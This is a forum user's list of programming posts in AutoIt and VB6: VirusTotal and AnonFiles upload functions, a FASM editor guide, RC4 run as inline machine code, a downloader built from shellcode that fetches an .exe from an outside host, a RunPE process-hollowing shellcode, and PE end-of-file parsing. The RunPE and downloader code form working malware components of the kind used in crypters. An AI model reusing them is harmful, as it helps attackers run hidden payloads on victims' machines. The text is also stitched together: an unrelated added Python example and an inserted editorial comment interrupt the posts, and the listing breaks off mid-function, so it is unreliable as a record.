Show Topics
1  Programming / Visual Basic Programming / Water Effect on Image on: 19 September 2013, 21:24 pm
Well, a few days ago I saw a very nice effect on the AutoIt forum. Today I felt like porting it to VB6.

Source code.

http://www.sendspace.com/file/qo1gmx
2  Programming / Scripting / [AutoIt] VirusTotal API 2.0 UDF on: 4 June 2013, 13:40 pm
Well, here is a UDF that I had ready a few days ago, but yesterday I decided to update it.  ;D

Requires WinHttp

http://www.autoitscript.com/forum/topic/84133-winhttp-functions/?hl=winhttp

Example:

Code
#include <Crypt.au3>
#include "VT.au3"

Example()

Func Example()
    ; MD5 of the local file; used below as the resource for rescan and comment
    _Crypt_Startup()
    Local $sFilePath = @WindowsDir & "\Explorer.exe"
    Local $bHash = _Crypt_HashFile($sFilePath, $CALG_MD5)
    _Crypt_Shutdown()

    Local $hVirusTotal = VT_Open()
    Local $APIkey = 'Your API key'
    ; report by hash, upload, rescan by hash, URL report, URL scan, comment
    ConsoleWrite(VT($hVirusTotal, $fReport, '20c83c1c5d1289f177bc222d248dab261a62529b19352d7c0f965039168c0654', $APIkey) & @CRLF)
    ConsoleWrite(VT($hVirusTotal, $fScan, $sFilePath, $APIkey) & @CRLF)
    ConsoleWrite(VT($hVirusTotal, $fRescan, Hex($bHash), $APIkey) & @CRLF)
    ConsoleWrite(VT($hVirusTotal, $uReport, "http://www.virustotal.com", $APIkey) & @CRLF)
    ConsoleWrite(VT($hVirusTotal, $uScan, "http://www.google.com", $APIkey) & @CRLF)
    ConsoleWrite(VT($hVirusTotal, $Comment, Hex($bHash), $APIkey, "Hello Word | Hola Mundo") & @CRLF)
    VT_Close($hVirusTotal)
EndFunc   ;==>Example


VT.au3 UDF

Code
#include-once
#include "WinHttp.au3"

; #INDEX# =================================================================================================
; Title .........: VT.au3
; AutoIt Version : 3.3.8.1
; Language ......: English
; Description ...: VirusTotal public API version 2.0 implementation in AutoIt
; Thanks to .....: trancexx|ProgAndy "WinHttp.au3"  ||| guinness "Suggestions+Snippets" ||| www.virustotal.com
; Reference .....: https://www.virustotal.com/es/documentation/public-api
; Written by ....: Danyfirex
; Date ..........: 12/05/2013 | Update 03/06/2013
; #FUNCTION# =============================================================================================

;===================CONSTANTS==================================
Global Const $__sVirusTotal_Page = 'www.virustotal.com'
Global Enum $eAPI_HttpOpen, $eAPI_HttpConnect
Global Enum $fReport, $fScan, $fRescan, $uReport, $uScan, $Comment
Global Const $tURL[6] = ['/vtapi/v2/file/report', '/vtapi/v2/file/scan', '/vtapi/v2/file/rescan', _
        '/vtapi/v2/url/report', '/vtapi/v2/url/scan', '/vtapi/v2/comments/put']
;==============================================================

; #FUNCTIONS# ==================================================
;VT() ;Use respective flag($Type)
;VT(ByRef $aAPI, $Type, $sResource, $sAPIkey,$Comments="")
;flags($Type)
;$fReport = retrieve a scan report on a given file
;$fScan   = submit a file for scanning
;$fRescan = rescan files in VirusTotal's file store
;$uReport = retrieve a scan report on a given URL
;$uScan   = submit a URL for scanning
;$Comment = make a comment on files and URLs
; ==============================================================

; #FUNCTION# =============================================================================================
; Name...........: VT_Open
; Description ...: Initialize and get session handle & connection handle
; Syntax.........: VT_Open()
; guinness
; #FUNCTION# =============================================================================================
Func VT_Open()
    Local $aAPI[2] = [0, 0]
    $aAPI[$eAPI_HttpOpen] = _WinHttpOpen()
    If @error Then $aAPI[$eAPI_HttpOpen] = -1
    $aAPI[$eAPI_HttpConnect] = _WinHttpConnect($aAPI[$eAPI_HttpOpen], $__sVirusTotal_Page)
    If @error Then $aAPI[$eAPI_HttpConnect] = -1
    Return $aAPI
EndFunc   ;==>VT_Open

; #FUNCTION# =============================================================================================
; Name...........: VT_Close
; Description ...: Close handles
; Syntax.........: VT_Close($handle)
; guinness
; #FUNCTION# =============================================================================================
Func VT_Close(ByRef Const $aAPI)
    _WinHttpCloseHandle($aAPI[$eAPI_HttpOpen])
    _WinHttpCloseHandle($aAPI[$eAPI_HttpConnect])
    Return True
EndFunc   ;==>VT_Close

; #FUNCTION# =============================================================================================
; Name...........: VT
; Syntax.........: VT(ByRef $aAPI, $Type, $sResource, $sAPIkey,$Comments="")
;VT($hVirusTotal, $fReport, '20c83c1c5d1289f177bc222d248dab261a62529b19352d7c0f965039168c0654',$APIkey)
;VT($hVirusTotal, $fScan, "C:\file.exe",$APIkey)
;VT($hVirusTotal, $fRescan, hex($bHash),$APIkey)
;VT($hVirusTotal, $uReport, "http://www.virustotal.com",$APIkey)
;VT($hVirusTotal, $uScan, "http://www.google.com",$APIkey)
;VT($hVirusTotal, $Comment, hex($bHash) ,$APIkey,"Hello Word | Hola Mundo")
; Parameters....: $Resource - md5/sha1/sha256/scan_id | filename | Url | respectively for flag($Type)
;                 $APIkey -  your API key.
;                 $Comments - your comments
; Return........: response format is a JSON object
; Note..........: $sResource and $Comments are concatenated into the form body as-is (not URL-encoded)
; #FUNCTION# =============================================================================================
Func VT(ByRef $aAPI, $Type, $sResource, $sAPIkey, $Comments = "")

    ; reopen the connection if the handle is invalid
    If $aAPI[$eAPI_HttpConnect] = -1 Then $aAPI = VT_Open()

    Select ;$fReport,$fScan,$fRescan,$uReport,$uScan,$Comment
        Case $Type = $fReport
            Return _WinHttpSimpleRequest($aAPI[$eAPI_HttpConnect], 'POST', $tURL[$Type], Default, 'resource=' & $sResource & '&key=' & $sAPIkey)

        Case $Type = $fScan
            ; multipart/form-data body: "apikey" field followed by the file content
            Local $sBoundary = "--------Boundary"
            Local $sHeaders = "Content-Type: multipart/form-data; boundary=" & $sBoundary & @CRLF
            Local $sData = ''
            $sData &= "--" & $sBoundary & @CRLF
            $sData &= 'Content-Disposition: form-data; name="apikey"' & @CRLF & @CRLF & $sAPIkey & @CRLF
            $sData &= "--" & $sBoundary & @CRLF
            $sData &= __WinHttpFileContent("", "file", $sResource, $sBoundary)
            $sData &= "--" & $sBoundary & "--" & @CRLF
            Return _WinHttpSimpleRequest($aAPI[$eAPI_HttpConnect], "POST", $tURL[$Type], Default, StringToBinary($sData, 0), $sHeaders)

        Case $Type = $fRescan
            Return _WinHttpSimpleRequest($aAPI[$eAPI_HttpConnect], "POST", "/vtapi/v2/file/rescan", Default, "resource=" & $sResource & "&key=" & $sAPIkey)

        Case $Type = $uReport
            Return _WinHttpSimpleRequest($aAPI[$eAPI_HttpConnect], 'POST', $tURL[$Type], Default, 'resource=' & $sResource & '&key=' & $sAPIkey)

        Case $Type = $uScan
            Return _WinHttpSimpleRequest($aAPI[$eAPI_HttpConnect], 'POST', $tURL[$Type], Default, 'url=' & $sResource & '&key=' & $sAPIkey)

        Case $Type = $Comment
            Return _WinHttpSimpleRequest($aAPI[$eAPI_HttpConnect], "POST", "/vtapi/v2/comments/put", Default, "resource=" & $sResource & _
                    "&comment=" & $Comments & "&key=" & $sAPIkey)

        Case Else
            ; unknown flag
            SetError(3)
    EndSelect

EndFunc   ;==>VT


Regards
3  Programming / Visual Basic Programming / Function: Send File to VirusTotal (Scan) on: 15 May 2013, 00:47 am
Hi, one more function.  ;D
It submits the sample, remember that!!!  >:D

Code
' =================================================================
' =================================================================
' => Author: Pink
' => Upload file to VirusTotal.com For Scanning
' => Thanks VirusTotal.com
' => Date : 14|05|2013
' => Usage: VT_Scan("c:\hola.exe","your_APIKey")
' => Returns:
'{"response_code": 1,
' "verbose_msg": "Scan request successfully queued, come back later for the report",
' "resource": "999f7d93aa3d4a1a94cccfb4ea96bc2e28fd48020a481aa2dc7e215f3ce27bc0",
' "scan_id": "999f7d93aa3d4a1a94cccfb4ea96bc2e28fd48020a481aa2dc7e215f3ce27bc0-1324376258",
' "permalink": "https://www.virustotal.com/file/999f7d93aa3d4a1a94cccfb4ea96bc2e28fd48020a481aa2dc7e215f3ce27bc0/analysis/1324376258/",
' "sha256": "999f7d93aa3d4a1a94cccfb4ea96bc2e28fd48020a481aa2dc7e215f3ce27bc0",
' "sha1": "2cc875bca8030d745adfd14388b8c001471c2474",
' "md5": "4a00e1a3a14e4fec6f2b353b4f20bb73"}
' =================================================================
' =================================================================
Option Explicit

Function VT_Scan(filepath As String, APIkey As String) As String
    Dim boundary As String
    Dim Post As String
    Dim bytesfinal()  As Byte
    Dim bytes() As Byte
    Dim Url As String
    Dim Http As Object
    Dim filedata As String

    Url = "https://www.virustotal.com/vtapi/v2/file/scan"
    boundary = "--------Boundary"

    ' Read the whole file into a byte array
    Open filepath For Binary As #1
    ReDim bytes(LOF(1) - 1)
    Get #1, , bytes()
    Close #1

    ' Bytes -> String so the file can be concatenated into the body
    ' (converted back with vbFromUnicode below; uses the system code page)
    filedata = StrConv(bytes(), vbUnicode)

    ' multipart/form-data body: "apikey" field, then the "file" part
    Post = "--" & boundary & vbCrLf & _
    "Content-Disposition: form-data; name=" & Chr(34) & "apikey" & Chr(34) & vbCrLf & vbCrLf & _
    APIkey & vbCrLf & _
    "--" & boundary & vbCrLf & _
    "Content-Disposition: form-data; name=" & Chr(34) & "file" & Chr(34) & "; filename=" & Chr(34) & filename(filepath) & Chr(34) & vbCrLf & _
    "Content-Type: application/octet-stream" & vbCrLf & vbCrLf & _
    filedata & vbCrLf & _
    "--" & boundary & "--" & vbCrLf

    bytesfinal() = StrConv(Post, vbFromUnicode)

    ' Synchronous POST; the JSON response text is returned
    Set Http = CreateObject("winhttp.winhttprequest.5.1")
    Http.Open "POST", Url, False
    Http.SetRequestHeader "Content-Type", "multipart/form-data; " & "boundary=" & boundary
    Http.Send (bytesfinal())
    VT_Scan = Http.Responsetext
    Set Http = Nothing
End Function


' Returns the last component of a backslash-separated path
Function filename(cadena As String) As String
    Dim cadenas() As String
    cadenas() = Split(cadena, "\")
    filename = cadenas(UBound(cadenas))
End Function

Regards
4  Programming / Visual Basic Programming / AnonFilesUpload Function on: 14 May 2013, 20:22 pm
A function to upload files to AnonFiles  :rolleyes:

Code
' =================================================================
' =================================================================
' => Author: Danyfirex
' => Upload file to AnonFiles.com
' => Thanks AnonFiles.com
' => Date : 14|05|2013
' => Usage: AnonFilesUpload("c:\hola.rar")
' => Returns: response text (hotlink)
' =================================================================
' =================================================================


Option Explicit

Function AnonFilesUpload(filepath As String) As String
    Dim boundary As String
    Dim Post As String
    Dim bytesfinal()  As Byte
    Dim bytes() As Byte
    Dim url As String
    Dim Http As Object
    Dim filedata As String

    url = "https://anonfiles.com/api/hotlink"
    boundary = "--------Boundary"

    ' Read the whole file into a byte array
    Open filepath For Binary As #1
    ReDim bytes(LOF(1) - 1)
    Get #1, , bytes()
    Close #1
    ' Bytes -> String (converted back with vbFromUnicode below; uses the system code page)
    filedata = StrConv(bytes(), vbUnicode)

    ' multipart/form-data body with a single "file" part
    Post = "--" & boundary & vbCrLf & _
    "Content-Disposition: form-data; name=" & Chr(34) & "file" & Chr(34) & "; filename=" & Chr(34) & filename(filepath) & Chr(34) & vbCrLf & _
    "Content-Type: application/octet-stream" & vbCrLf & vbCrLf & _
    filedata & vbCrLf & _
    "--" & boundary & "--" & vbCrLf

    bytesfinal() = StrConv(Post, vbFromUnicode)

    ' Synchronous POST; the response text is returned
    Set Http = CreateObject("winhttp.winhttprequest.5.1")
    Http.Open "POST", url, False
    Http.SetRequestHeader "Content-Type", "multipart/form-data; " & "boundary=" & boundary
    Http.Send (bytesfinal())
    AnonFilesUpload = Http.ResponseText
    Set Http = Nothing
End Function

' Returns the last component of a backslash-separated path
Function filename(cadena As String) As String
    Dim cadenas() As String
    cadenas() = Split(cadena, "\")
    filename = cadenas(UBound(cadenas))
End Function
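
The upload functions in posts 2, 3 and 4 all build a multipart/form-data body around the fixed boundary "--------Boundary" and place the file name inside a quoted header parameter. The following is an added example, not code from the posts: it builds the same kind of body on raw bytes, picks a boundary that does not occur in the file, and rejects CR/LF in header values. The function names and the sample input are constructed for illustration.

```python
import secrets

CRLF = b"\r\n"


def _quote_param(value: str) -> str:
    """Make a value safe inside a quoted Content-Disposition parameter."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in multipart header values")
    return value.replace("\\", "\\\\").replace('"', '\\"')


def pick_boundary(parts_data, candidate=None):
    """Return a boundary whose delimiter line occurs in none of the parts."""
    for _ in range(16):
        boundary = candidate or secrets.token_hex(16)
        marker = b"--" + boundary.encode("ascii")
        if not any(marker in data for data in parts_data):
            return boundary
        candidate = None  # requested boundary collides: fall back to random
    raise RuntimeError("could not find a collision-free boundary")


def build_multipart(fields, file_field, filename, file_bytes, boundary=None):
    """Return (content_type, body); file_bytes is never decoded or re-encoded."""
    values = [v.encode("utf-8") for v in fields.values()]
    boundary = pick_boundary(values + [file_bytes], boundary)
    delim = b"--" + boundary.encode("ascii")
    body = bytearray()
    for name, value in fields.items():
        body += delim + CRLF
        body += f'Content-Disposition: form-data; name="{_quote_param(name)}"'.encode() + CRLF + CRLF
        body += value.encode("utf-8") + CRLF
    body += delim + CRLF
    body += (f'Content-Disposition: form-data; name="{_quote_param(file_field)}"; '
             f'filename="{_quote_param(filename)}"').encode() + CRLF
    body += b"Content-Type: application/octet-stream" + CRLF + CRLF
    body += file_bytes + CRLF
    body += delim + b"--" + CRLF
    return f"multipart/form-data; boundary={boundary}", bytes(body)


def split_multipart(content_type, body):
    """Minimal splitter used to check a body: returns {part name: payload}."""
    boundary = content_type.split("boundary=", 1)[1].encode("ascii")
    out = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter
            break
        headers, _, payload = chunk[len(CRLF):].partition(CRLF + CRLF)
        name = headers.split(b'name="', 1)[1].split(b'"', 1)[0].decode()
        out[name] = payload[:-len(CRLF)]
    return out


def demo():
    # Constructed sample: every byte value, plus the delimiter line that the
    # fixed boundary "--------Boundary" would produce inside the file itself.
    sample = bytes(range(256)) + b"\r\n----------Boundary\r\nrest of file"
    ctype, body = build_multipart({"apikey": "PLACEHOLDER_KEY"}, "file",
                                  'a"b.exe', sample, boundary="--------Boundary")
    return ctype, split_multipart(ctype, body), sample


if __name__ == "__main__":
    ctype, parts, sample = demo()
    print(ctype)
    print("file part intact:", parts["file"] == sample)
```
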
5  Programming / ASM / Tutorial: mini-IDE for FASM with gedit (Linux) on: 20 April 2013, 18:08 pm
Hi. I bring you this short guide to configuring gedit + FASM on Linux (Ubuntu).

Requirements
gedit installed.
Official page
http://projects.gnome.org/gedit/

First we download the necessary files from here.

http://www.sendspace.com/file/mrb69d

Fasm-1.70.03.tz
asm-intel.lang
comandos
Steps

Then we extract Fasm-1.70.03.tz and put the "FASM" folder wherever we like.
I chose "/home/pink/fasm/"

Now on to gedit.

We copy our asm-intel.lang file to:

/usr/share/gtksourceview-3.0/language-specs/asm-intel.lang

gtksourceview-3.0 may vary (gtksourceview-2.0), depending on the version.

Copying requires root permissions.

I did it the following way.

Alt+F2

Then we enter

gksu nautilus

This way we browse as root and can copy files anywhere.

Done. Now to configure our IDE for FASM.

1. We open gedit

2. In the top menu we go to "Edit" and open Preferences

http://i.imgur.com/OqinxSM.png

Go by this one even though it is in English (my Ubuntu is in English) :S.

We enable

-Show line numbers

The changes in the Editor and Font/Color tabs are up to your preference.

In the Plugins tab we select External Tools.

Now the debugger and the commands to compile and run.

To show the debugger (Ctrl+F9), in the top menu we go to "View" and enable Bottom Panel.

And the Shell Output will appear at the bottom.

The commands.

In the menu bar we go to "Tools" > Manage External Tools

This opens the window where we will configure it.

I modified the Build one directly (anyone who wants to can create a new one).

We paste the code that is in the text file "comandos.txt" (important).
We set the shortcut key.
Save: Current document
Output: Display in bottom panel (important)

Remember to modify
dirfasm to point to wherever the fasm executable is.

Done, now we have our IDE for FASM on Linux.

Here are some screenshots of the final result.

Any questions, just ask.

Regards

Pink(Danyfirex)
6  Programming / Visual Basic Programming / [CONTRIBUTION] RC4 inline ASM on: 7 April 2013, 03:08 am
Well, I was trying out a few things and translated this cipher.

Code
  1. ' =================================================================
  2. ' =================================================================
  3. ' => Author: Pink
  4. ' => RC4 inline ASM
  5. ' => Thanks Ward (AutoIt version)
  6. ' => Date : 01|04|2013
  7. ' => Usage: misbytes()=RC4ASM(bytesacifrar(),"clave")
  8. ' =================================================================
  9. ' =================================================================
  10.  
  11.  
  12. Option Explicit
  13.  
  14. Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  15.  
  16.  
  17. Public Function RC4ASM(datos() As Byte, pass As String) As Byte()
  18. Dim passbyte() As Byte
  19. Dim B_RC4() As Byte
  20. Dim Str_OP  As String
  21. Dim i As Long
  22.  
  23. Str_OP = "C81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF8"
  24. Str_OP = Str_OP & "88435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
  25. passbyte = StrConv(pass, vbFromUnicode)
  26.  
  27. ReDim B_RC4((Len(Str_OP) / 2) - 1)
  28. For i = 1 To Len(Str_OP) - 1 Step 2
  29. B_RC4(Int(i / 2)) = CByte("&h" & Mid(Str_OP, i, 2))
  30. Next
  31.  
  32. CallWindowProcW VarPtr(B_RC4(0)), VarPtr(datos(0)), UBound(datos) + 1, VarPtr(passbyte(0)), 0
  33.  
  34. RC4ASM = datos()
  35.  
  36. End Function

Regards
7  Programming / Scripting / Download Function [AutoIt] on: 17 December 2012, 16:04 pm
Well, here is the AutoIt version of the one I made in Delphi.

Code:
#cs -------------------------------------------------------
AutoIt Version: 3.3.8.1
Translated by..........: Pink
Thanks........: monoceres
Delphi version by........:  Pink
Script Function...: Download
Usage..............:Download($urlfile,$pathtosave)
#ce -------------------------------------------------------

Download("http://whitehat.su/Anotador.exe","C:\file.exe")
Func Download($Url,$path)
local $bytes = DllStructCreate("byte[512]")
local $Address= DllCall("Kernel32.dll", "ptr", "GetProcAddress", "ptr",GetModuleHandle("urlmon.dll"), "str", "URLDownloadToFileW")
$Address= $Address[0]
Local $Bufferurl = DllStructCreate("wchar url[" & StringLen($Url) +1 & "]")
Local $Bufferpath = DllStructCreate("wchar path[" & StringLen($path) +1  & "]")
    DllStructSetData($Bufferurl, "url", $Url)
    DllStructSetData($Bufferpath, "path", $path)

Local $Opcode
$Opcode &= "0x"
$Opcode &= "33DB"
$Opcode &= "68" & SwapEndian(0)
$Opcode &= "68" & SwapEndian(0)
$Opcode &= "68" & SwapEndian(DllStructGetPtr($Bufferpath, 1))
$Opcode &= "68" & SwapEndian(DllStructGetPtr($Bufferurl, 1))
$Opcode &= "68" & SwapEndian(0)
$Opcode &= "B8" & SwapEndian($Address)
$Opcode &= "FFD0"
$Opcode &= "53"
$Opcode &= "58"
$Opcode &= "C3"
DllStructSetData($bytes, 1, $Opcode)
Local $Ret = DllCall("user32.dll", "int", "CallWindowProc", "ptr", DllStructGetPtr($bytes), "int", 0, "int", 0, "int", 0, "int", 0)
EndFunc

Func GetModuleHandle($sModuleName)
Local $sModuleNameType = "wstr"
If $sModuleName = "" Then
  $sModuleName = 0
  $sModuleNameType = "ptr"
EndIf
Local $aResult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", $sModuleNameType, $sModuleName)
If @error Then Return SetError(@error, @extended, 0)
Return $aResult[0]
EndFunc ;==>GetModuleHandle WinAPI

Func SwapEndian($hex)
    Return Hex(Binary($hex))
EndFunc   ;==>SwapEndian


Regards
8  Programming / Scripting / [AutoIt] RunPE Shellcode on: 6 December 2012, 15:44 pm
Well, here is the AutoIt version of mshRunPE that I made a while ago. A simple example of how to use shellcode in AutoIt.  ;D

Code
  1. #cs -------------------------------------------------------
  2. AutoIt Version: 3.3.8.1
  3. Translated by..........: Pink
  4. Thanks: hamavb & iCodeInVB6
  5. Script Function...: RunPE-ShellCode "Run executable in memory"
  6. Usage..............: RunPE(Path,$archivobinario)
  7. #ce -------------------------------------------------------
  8.  
  9.  
  10. Func RunPE($path,$filebin)
  11.  
  12.  
  13. local  $ASM = "0x60E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F030000"
  14.    $ASM &= "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C0300008B09C701440000006A12E84D030000685BE814CF51E8790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF31FFD06A12E823030000685BE814CF51E84F0300006A1EE8110300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200008B0968F80000005751FFD06A00E8E80200006888FEB31651E8140300006A2EE8D60200"
  15.    $ASM &= "008B396A2AE8CD0200008B116A42E8C402000057526A006A006A046A006A006A006A00FF31FFD06A12E8A902000068D03710F251E8D50200006A22E8970200008B116A2EE88E0200008B09FF7234FF31FFD06A00E87E020000689C951A6E51E8AA0200006A22E86C0200008B118B396A2EE8610200008B096A406800300000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E0200008B396A3EE8350200"
  16.    $ASM &= "008B316A22E82C0200008B016A2EE8230200008B0952FF775456FF7034FF316A00E81002000068A16A3DD851E83C02000083C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8CE010000C70100000000B8280000006A36E8BC010000F7216A1EE8B30100008B118B523C81C2F800000003D06A3EE89F01000003116A26E8960100006A"
  17.    $ASM &= "2852FF316A12E88A010000685BE814CF51E8B601000083C40CFFD06A26E8730100008B398B098B71146A3EE86501000003316A26E85C0100008B098B510C6A22E8500100008B090351346A46E8440100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F4000000"
  18.    $ASM &= "8B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD06A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400000083C6086A2EE89D0000008B116A46E894000000516A045756FF326A00E88600000068A16A3DD851E8B200000083C40CFFD06A22E86F0000008B098B51280351346A32E8600000008B0981C1B000000089116A00E8"
  19.    $ASM &= "4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A2EE8340000008B09FF32FF7104FFD06A00E82400000068883F4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CAAF9151E81E0000006A406800100000FF7424186A00FFD0FF742414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E84B00000083C408FF742404"
  20.    $ASM &= "FFD0FF74240850E83800000083C408C355525153565733C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE330498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F5E5B595A5DC3C300000000"
  21.  
  22.  
  23. Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")
  24. Local $binBuffer=DllStructCreate("byte[" & BinaryLen($filebin) & "]")
  25.  
  26.  
  27. DllStructSetData($BufferASM, 1, $ASM)
  28. DllStructSetData($binBuffer, 1, $filebin)
  29.  
  30.  
  31.  
  32.  
  33. Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
  34.            "ptr", DllStructGetPtr($BufferASM), _
  35.            "wstr", ($Path), _
  36.            "ptr", DllStructGetPtr($binBuffer), _
  37.            "int", 0, _
  38.            "int", 0)
  39.  
  40. EndFunc


Regards
9  Programming / Visual Basic Programming / ASM + Visual Basic: Question About Printing a Number on: 10 October 2012, 19:01 pm
Hi, I'm studying all this inline ASM stuff,

and I would like to know how to do this simple ASM routine in VB.

Code

       B8                      mov eax, 00000080
       C3                      ret

What I mean is printing or showing a simple number in a MsgBox, in this case 128.

10  Programming / Scripting / [AutoIt] Get_EOF Examples on: 27 August 2012, 15:19 pm
Well, here is a small contribution for those who like AutoIt  ;D

Here are two examples, one with structures and the other without.

Code
#cs -------------------------------------------------------
AutoIt Version: 3.3.8.1
Author..........: Pink
Script Function...: Get_EOF
Usage............: Get_EOF(file path)
Returns : "EOF position"
Thanks: EON-Karcrack-The Swash
#ce -------------------------------------------------------

; Example
$Path = "C:\Users\Usuario\Desktop\Anotador.exe"
MsgBox(0, "", Get_EOF($Path))

Func Get_EOF($MyFile)
    Local $File = FileOpen($MyFile, 16) ; 16 = binary mode
    If $File = -1 Then ; FileOpen returns -1 on failure (it does not set @error)
        MsgBox(0, "Error", "No se Pudo leer el Archivo")
        Return SetError(1, 0, 0)
    EndIf

    ; Load the whole file into a byte buffer
    Local $FileLen = FileGetSize($MyFile)
    Local $Binary = DllStructCreate("byte[" & $FileLen & "]")
    DllStructSetData($Binary, 1, FileRead($File))
    FileClose($File)
    Local $BinaryPtr = DllStructGetPtr($Binary)

    Local Const $I_N_H_Len = 248 ; size of IMAGE_NT_HEADERS for a 32-bit (PE32) file
    Local Const $I_F_H_Len = 20  ; IMAGE_FILE_HEADER
    Local Const $I_O_H_Len = 224 ; IMAGE_OPTIONAL_HEADER (PE32)
    Local Const $I_S_H_Len = 40  ; IMAGE_SECTION_HEADER

    Local $IMAGE_DOS_HEADER = DllStructCreate( _
            "WORD e_magic;WORD e_cblp;WORD e_cp;WORD e_crlc;WORD e_cparhdr;WORD e_minalloc;WORD e_maxalloc;" & _
            "WORD e_ss;WORD e_sp;WORD e_csum;WORD e_ip;WORD e_cs;WORD e_lfarlc;WORD e_ovno;" & _
            "WORD e_res[4];WORD e_oemid;WORD e_oeminfo;WORD e_res2[10];WORD e_lfanew", $BinaryPtr)

    ; 23177 = 0x5A89? No: 23117 would be "MZ"; value kept as posted by the author
    If DllStructGetData($IMAGE_DOS_HEADER, "e_magic") <> 23177 Then
        MsgBox(0, "Error", "Firma MZ No Encontrada")
    EndIf

    ; Move to IMAGE_NT_HEADERS
    $BinaryPtr += DllStructGetData($IMAGE_DOS_HEADER, "e_lfanew")

    Local $IMAGE_NT_HEADERS = DllStructCreate( _
            "DWORD signature;CHAR ifh[" & $I_F_H_Len & "];CHAR ioh[" & $I_O_H_Len & "]", $BinaryPtr)

    ; 17744 = 0x4550 = "PE"
    If DllStructGetData($IMAGE_NT_HEADERS, "signature") <> 17744 Then
        MsgBox(0, "Error", "Firma PE No Encontrada")
    EndIf

    Local $IMAGE_FILE_HEADER = DllStructCreate( _
            "WORD machine;WORD numberofsections;DWORD timedatestamp;DWORD pointertosymboltable;DWORD numberofsymbols;" & _
            "WORD SizeOfOptionalHeader;WORD characteristics", DllStructGetPtr($IMAGE_NT_HEADERS, "ifh"))

    Local $IMAGE_OPT_HEADER = DllStructCreate( _
            "WORD magic;BYTE majorlinkerversion;BYTE minorlinkerversion;DWORD sizeofcode;DWORD sizeofinitializeddata;" & _
            "DWORD sizeofuninitializeddata;DWORD addressofentrypoint;DWORD baseofcode;DWORD baseofdata;DWORD imagebase;" & _
            "DWORD sectionalignment;DWORD filealignment;WORD majoroperatingsystemversion;WORD minoroperatingsystemversion;" & _
            "WORD majorimageversion;WORD minorimageversion;WORD majoresubsystemversion;WORD minorsubsystemversion;" & _
            "DWORD win32versionvalue;DWORD sizeofimage;DWORD sizeofheaders;DWORD checksum;WORD subsystem;WORD dllcharacteristics;" & _
            "DWORD sizeofstackreserve;DWORD sizeofstackcommit;DWORD sizeofheapcommit;DWORD loaderflags;DWORD numberofrvaandsizes;" & _
            "DOUBLE datadirectory[16]", DllStructGetPtr($IMAGE_NT_HEADERS, "ioh"))

    ; Skip IMAGE_NT_HEADERS: pointer is now at the first section header
    $BinaryPtr += $I_N_H_Len

    Local $InicioINT = DllStructGetData($IMAGE_DOS_HEADER, "e_lfanew")
    Local $NS = DllStructGetData($IMAGE_FILE_HEADER, 'numberofsections') - 1
    Local $UTLS = $NS * $I_S_H_Len

    ; Advance to the last section header in the table
    $BinaryPtr += $UTLS

    Local $IMAGE_SECTION_HEADER = DllStructCreate( _
            "CHAR name[8];DWORD virtualsize;DWORD virtualaddress;DWORD sizeofrawdata;DWORD pointertorawdata;DWORD pointertorelocations;" & _
            "DWORD pointertolinenumbers;WORD numberofrelocations;WORD numberoflinenumbers;DWORD characteristics", $BinaryPtr)

    Local $RawSize = Dec(Hex(DllStructGetData($IMAGE_SECTION_HEADER, "SizeOfRawData")))
    Local $RawOffset = Dec(Hex(DllStructGetData($IMAGE_SECTION_HEADER, "PointerToRawData")))

    ; End of the last section's raw data
    Return $RawSize + $RawOffset

EndFunc   ;==>Get_EOF

Code
#cs -------------------------------------------------------
AutoIt Version: 3.3.8.1
Author..........: Pink
Script Function...: Get_EOF
Usage............: Get_EOF(file path)
Returns : "EOF position"
Thanks: EON-Karcrack-The Swash
#ce ------------------------------------

; Example

Local $myfile = "C:\Users\Usuario\Desktop\Anotador.exe"

MsgBox(0, "", Get_EOF($myfile))

Func Get_EOF($file)
    Const $l_fanew = 60
    Const $PEsize = 4
    Const $I_F_H = 20
    Const $SizeS = 40
    Local $LFvalue   ; offset of IMAGE_NT_HEADERS (PE signature)
    Local $Size_O_H  ; SizeOfOptionalHeader
